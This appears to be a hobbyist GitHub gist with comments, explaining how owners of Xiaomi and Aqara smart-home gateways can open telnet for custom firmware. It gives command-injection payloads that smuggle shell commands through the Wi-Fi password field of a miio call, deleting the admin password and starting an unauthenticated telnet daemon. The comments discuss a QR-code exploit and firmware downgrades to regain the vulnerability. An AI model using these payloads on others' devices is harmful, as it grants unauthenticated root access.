soft_hack.md

soft_hack.md

Soft hack to open telnet

You need gateway 3(mgl03) connected to MiHome. And also ip and gateway token.

1 way (recommended)

Via XiaomiGateway3 component.

You must input in the 'Open Telnet command' field(as it is without changing anything):

{"method":"set_ip_info","params":{"ssid":"\"\"","pswd":"123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd"}}

2 way (recommended if not using Home Assistant)

php-miio (https://github.com/skysilver-lab/php-miio)

You may need to change id.

php miio-cli.php --ip GW_IP --token GW_TOKEN --sendcmd '{"id":123,"method":"set_ip_info","params":{"ssid":"\"\"","pswd":"123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd"}}'

3 way (maybe problem with sequence id)

python-miio (https://github.com/rytilahti/python-miio)

miiocli device --ip GW_IP --token GW_TOKEN raw_command set_ip_info '{"ssid":"\"\"","pswd":"123123 ; passwd -d admin ; echo enable > /sys/class/tty/tty/enable; telnetd"}'

Login: admin

Password is empty

After opening telnet, it is better to install custom firmware (only for Xiaomi Gateway 3 mgl03).

Read here: https://github.com/zvldz/mgl03_fw/tree/main/firmware#the-easy-way

Open telnet command should also work with:

• lumi.gateway.mgl03 - Mi Smart Home Hub
• lumi.gateway.acn01 - Aqara Hub M1S CN
• lumi.gateway.aeu01 - Aqara Hub M1S EU
• lumi.aircondition.acn05 - Aqara Air Conditioning Controller P3
• lumi.gateway.sacn01 - Smart USB Wall Outlet Hub

Aqara Hub E1 (ZHWG16LM usb stick)

You need gateway E1 connected to MiHome. And also ip and gateway token.

1 way (recommended)

Via XiaomiGateway3 component, version 2+.

You must input in the 'Open Telnet command' field(as it is without changing anything):

{"method":"set_ip_info","params":{"ssid":"\"\"","pswd":"123123 ; /bin/riu_w 101e 53 3012; telnetd"}}

2 way (recommended if not using Home Assistant)

php-miio (https://github.com/skysilver-lab/php-miio)

You may need to change id.

php miio-cli.php --ip GW_IP --token GW_TOKEN --sendcmd '{"id":123,"method":"set_ip_info","params":{"ssid":"\"\"","pswd":"123123 ; /bin/riu_w 101e 53 3012; telnetd"}}'

3 way (maybe problem with sequence id)

python-miio (https://github.com/rytilahti/python-miio)

miiocli device --ip GW_IP --token GW_TOKEN raw_command set_ip_info '{"ssid":"\"\"","pswd":"123123 ;  /bin/riu_w 101e 53 3012 ; telnetd"}'

Login: root

Password is empty

I am not author, I just tested and improved and published.

Enable telnet on Aqara G3 hub

@Wh1terat I'm trying to get your code working. I make the QR code, scan it with camera, all good to this point. After it fails, what specifically do I do? Reset the camera and add to Aqara app? fill in ssid/pwd in app and then use camera to scan legit QR code? thanks

No need to reset the camera, just try to add it to the app with a legit QR code. Be aware most firmwares for the last year or two have been patched and are no longer vulnerable. There are methods to downgrade.

I got lucky! I got the firmware that works
It must be working because I can use the G3 in Home Assistant
Is there a way to downgrade G2H Pro firmware?

@wizardofozzie niceboygithub/AqaraGateway#179

@wizardofozzie niceboygithub/AqaraGateway#179

@Wh1terat that's crazy- thanks so much!

For G2hPro, I have downgraded to firmware 3.3.4 but telnet won't work. I booted an SD with custom firmware onto the camera but telnet 192.168.1.101 is refused. Any ideas?

@wizardofozzie niceboygithub/AqaraGateway#179

@Wh1terat that's crazy- thanks so much!

For G2hPro, I have downgraded to firmware 3.3.4 but telnet won't work. I booted an SD with custom firmware onto the camera but telnet 192.168.1.101 is refused. Any ideas?

i think the new g2h pro camera fix the bug ,so you can not use telnet. Because my g2h pro can use telnet.

Is there any solution for lumi.gateway.mgl001?